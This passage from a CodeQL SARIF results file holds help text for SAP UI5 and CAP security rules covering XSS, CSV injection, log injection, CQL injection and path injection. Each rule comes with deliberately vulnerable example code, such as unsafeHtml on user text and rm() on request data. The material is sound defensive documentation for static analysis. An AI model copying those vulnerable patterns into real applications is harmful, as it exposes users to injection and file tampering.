`sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n","markdown":"# Access to user-controlled UI5 Logs\n\nProcessing user-controlled log entries can lead to injection vulnerabilities, where an attacker can manipulate user input to affect the application excution.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where user-controlled log entries are accessed in a UI5 application. \n\n## Recommendation\n\nAvoid accessing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component retrieves log entries to further process them.\n```javascript\nlet message = Log.getLogEntries()[0].message; //access to user controlled logs\ndo_smth(message);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n"},"properties":{"tags":["security","external/cwe/cwe-117"],"description":"Log entries from user-controlled sources should not be further processed.","id":"js/ui5-unsafe-log-access","kind":"path-problem","name":"Access to user-controlled UI5 Logs","precision":"medium","problem.severity":"warning","security-severity":"5"}},{"id":"js/ui5-formula-injection","name":"js/ui5-formula-injection","shortDescription":{"text":"UI5 Formula Injection"},"fullDescription":{"text":"Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n    \"sap/ui/core/Controller\",\n    \"sap/ui/core/util/File\"\n  ], function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onSomeEvent: function(oEvent) {\n         let response = oEvent.getProperty(\"someProperty\").someField;\n         let csvRow = \";\" + response + \";\";\n         File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n      }\n    });\n  });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n","markdown":"# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n    \"sap/ui/core/Controller\",\n    \"sap/ui/core/util/File\"\n  ], function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onSomeEvent: function(oEvent) {\n         let response = oEvent.getProperty(\"someProperty\").someField;\n         let csvRow = \";\" + response + \";\";\n         File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n      }\n    });\n  });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n"},"properties":{"tags":["security","external/cwe/cwe-1236"],"description":"Saving data from an uncontrolled remote source using filesystem or local storage\n              leads to disclosure of sensitive information or forgery of entry.","id":"js/ui5-formula-injection","kind":"path-problem","name":"UI5 Formula Injection","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/ui5-xss","name":"js/ui5-xss","shortDescription":{"text":"UI5 Client-side cross-site scripting"},"fullDescription":{"text":"Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API  with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"string\" } } },\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(oControl.getText()); // sink\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\t <!-- XSS Source -->\n  <sap.ui.core.HTML content=\"{/input}\"/> <!-- XSS Sink -->\n</sap.ui.core.mvc.View>\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n  function (Controller, JSONModel) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function () {\n        var oData = { input: null };\n        var oModel = new JSONModel(oData);\n        this.getView().setModel(oModel);\n      },\n    });\n  },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\n  <sap.ui.core.HTML content=\"{/input}\" sanitizeContent=\"true\" />\n</sap.ui.core.mvc.View>\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API  with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"string\" } } },\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(oControl.getText()); // sink\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\t <!-- XSS Source -->\n  <sap.ui.core.HTML content=\"{/input}\"/> <!-- XSS Sink -->\n</sap.ui.core.mvc.View>\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n  function (Controller, JSONModel) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function () {\n        var oData = { input: null };\n        var oModel = new JSONModel(oData);\n        this.getView().setModel(oModel);\n      },\n    });\n  },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\n  <sap.ui.core.HTML content=\"{/input}\" sanitizeContent=\"true\" />\n</sap.ui.core.mvc.View>\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Writing user input directly to a UI5 View allows for\n              a cross-site scripting vulnerability.","id":"js/ui5-xss","kind":"path-problem","name":"UI5 Client-side cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}}],"locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-ui5-models","semanticVersion":"2.3.0","locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/ui5/ext/ext/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}],"properties":{"isCodeQLModelPack":true}},{"name":"codeql/javascript-all","semanticVersion":"2.6.18+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-all/2.6.18/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-all/2.6.18/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"codeql/threat-models","semanticVersion":"1.0.38+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/threat-models/1.0.38/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/threat-models/1.0.38/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-cap-queries","semanticVersion":"2.3.0+4627b48907d3149838f214e246d09f1605391fcb","rules":[{"id":"js/cap-log-injection","name":"js/cap-log-injection","shortDescription":{"text":"CAP Log injection"},"fullDescription":{"text":"Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging.  It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n  this.on ('submitOrder', async req => {\n    const {book,quantity} = req.data\n    const LOG = cds.log(\"nodejs\");\n    LOG.info(\"test\" + book); // Log injection alert\n  })\n\n  return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n","markdown":"# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging.  It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n  this.on ('submitOrder', async req => {\n    const {book,quantity} = req.data\n    const LOG = cds.log(\"nodejs\");\n    LOG.info(\"test\" + book); // Log injection alert\n  })\n\n  return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n"},"properties":{"tags":["security"],"description":"Building log entries from user-controlled sources is vulnerable to\n              insertion of forged log entries by a malicious user.","id":"js/cap-log-injection","kind":"path-problem","name":"CAP Log injection","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/cap-sql-injection","name":"js/cap-sql-injection","shortDescription":{"text":"CQL query built from user-controlled sources"},"fullDescription":{"text":"Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = <from user input>\nconst column = <from user input>\nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injectionn).\n- OWASP: [SQL Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n","markdown":"# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = <from user input>\nconst column = <from user input>\nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injectionn).\n- OWASP: [SQL Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n"},"properties":{"tags":["security"],"description":"Building a CQL query from user-controlled sources is vulnerable to insertion of\n              malicious code by the user.","id":"js/cap-sql-injection","kind":"path-problem","name":"CQL query built from user-controlled sources","precision":"high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/cap-path-injection","name":"js/cap-path-injection","shortDescription":{"text":"Use of user controlled input in CAP CDS file system utilities"},"fullDescription":{"text":"Using unchecked user controlled values can allow an attacker to affect paths constructed and accessed in the filesystem."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# CAP CDS Utils used with user-controlled sources\n\nIf a path is constructed from user-provided input without sufficient sanitization, a malicious user may be able to manipulate the contents of the filesystem without proper authorization.\n\nAdditionally if user-provided input is used to create file contents this can also result in a malicious user manipulating the filesystem in an unchecked way.\n\n## Recommendation\n\nCAP applications using CDS Utils should not use user-provided input without sanitization.\n\nThe sanitization stragety can vary depending on what types of paths are satisfactory as user-provided input. A simple approach to sanitization is to check user-provided input against an allow list. Other potential approaches include checking components of paths or normalizing them to make sure that the path does not escape the expected root folder. \n\nNormalization techniques should be carefully considered and simple naive replacement strategies will not be sufficient, for example replacing any match of a parent directory reference (`../`) in the sample `.../...//` will still result in the path `../` being used which could escape the intended directory.\n\n## Examples\n\nThis CAP service directly uses user-provided input to construct a path.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n\n    init() {\n        this.on(\"send1\", async (req) => {\n            let userinput = req.data\n            await rm(userinput, 'db', 'data') // Path injection alert\n        }\n    }\n}\n```\n\nThis CAP service directly uses user-provided input to add content to a file.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"send1\", async (req) => {\n      let userinput = req.data\n      await write(userinput).to('db/data') // Path injection alert\n\n      // GOOD: the path can not be controlled by an attacker\n      let allowedDirectories = [\n        'this-is-a-safe-directory'\n      ];\n      if (allowedDirectories.includes(userinput)) {\n        await rm(userinput) // sanitized - No Path injection alert\n      }\n    }\n  }\n}\n```\n\n## References\n\n- OWASP 2021: [Injection](https://owasp.org/Top10/A03_2021-Injection/).\n- SAP CAP CDS Utils : [Documentation](https://cap.cloud.sap/docs/node.js/cds-utils).\n- Common Weakness Enumeration: [CWE-020](https://cwe.mitre.org/data/definitions/20.html).\n- Common Weakness Enumeration: [CWE-022](https://cwe.mitre.org/data/definitions/22.html).\n","markdown":"# CAP CDS Utils used with user-controlled sources\n\nIf a path is constructed from user-provided input without sufficient sanitization, a malicious user may be able to manipulate the contents of the filesystem without proper authorization.\n\nAdditionally if user-provided input is used to create file contents this can also result in a malicious user manipulating the filesystem in an unchecked way.\n\n## Recommendation\n\nCAP applications using CDS Utils should not use user-provided input without sanitization.\n\nThe sanitization stragety can vary depending on what types of paths are satisfactory as user-provided input. A simple approach to sanitization is to check user-provided input against an allow list. Other potential approaches include checking components of paths or normalizing them to make sure that the path does not escape the expected root folder. \n\nNormalization techniques should be carefully considered and simple naive replacement strategies will not be sufficient, for example replacing any match of a parent directory reference (`../`) in the sample `.../...//` will still result in the path `../` being used which could escape the intended directory.\n\n## Examples\n\nThis CAP service directly uses user-provided input to construct a path.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n\n    init() {\n        this.on(\"send1\", async (req) => {\n            let userinput = req.data\n            await rm(userinput, 'db', 'data') // Path injection alert\n        }\n    }\n}\n```\n\nThis CAP service directly uses user-provided input to add content to a file.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"send1\", async (req) => {\n      let userinput = req.data\n      await write(userinput).to('db/data') // Path injection alert\n\n      // GOOD: the path can not be controlled by an attacker\n      let allowedDirectories = [\n        'this-is-a-safe-directory'\n      ];\n      if (allowedDirectories.includes(userinput)) {\n        await rm(userinput) // sanitized - No Path injection alert\n      }\n    }\n  }\n}\n```\n\n## References\n\n- OWASP 2021: [Injection](https://owasp.org/Top10/A03_2021-Injection/).\n- SAP CAP CDS Utils : [Documentation](https://cap.cloud.sap/docs/node.js/cds-utils).\n- Common Weakness Enumeration: [CWE-020](https://cwe.mitre.org/data/definitions/20.html).\n- Common Weakness Enumeration: [CWE-022](https://cwe.mitre.org/data/definitions/22.html).\n"},"properties":{"tags":["security","external/cwe/cwe-020","external/cwe/cwe-022"],"description":"Using unchecked user controlled values can allow an\n              attacker to affect paths constructed and accessed in\n              the filesystem.","id":"js/cap-path-injection","kind":"path-problem","name":"Use of user controlled input in CAP CDS file system utilities","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/cap-non-prod-auth-strategy","name":"js/cap-non-prod-auth-strategy","shortDescription":{"text":"Non-production authentication strategy used"},"fullDescription":{"text":"Using non-production authentication strategies can lead to unwanted authentication behavior in production."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Non-Production Authentication Strategy Used without Profiles\n\nUsing a non-production authentication strategy without setting up a distinct profile for development may pose allow unintended authentication and/or authorization if the application is deployed into production.\n\n## Recommendation\n\n### Isolate the use of development-level strategies to a development profile\n\nUse separate profiles for development and deployment and select one as needed. In this way, properties including authentication strategies can be substituted by changing a single command line option: `--profile`. For example, having the following section in the application's `package.json` states that the `\"dummy\"` authentication strategy must be used while `\"xsuaa\"`, a production-grade strategy, should be used when deployed:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    },\n    \"[deploy]\": {\n      \"auth\": \"xsuaa\"\n    }\n  }\n}\n```\n\nThe application can be now run in different modes depending on the `--profile` command line option:\n\n``` shell\n$ cds serve --profile dev    # Runs the application in development profile with strategy \"dummy\"\n$ cds serve --profile deploy # Runs the application in development profile with strategy 